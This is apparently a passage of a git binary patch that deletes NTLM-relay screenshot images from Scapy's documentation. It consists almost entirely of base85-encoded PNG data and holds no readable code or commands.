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 diff --git a/doc/scapy/graphics/ntlm/ntlmrelay_smb_win1.png b/doc/scapy/graphics/ntlm/ntlmrelay_smb_win1.png deleted file mode 100644 index e35dd103bf2aff50a3d1a103aa29608b5c78599a..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 64555 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 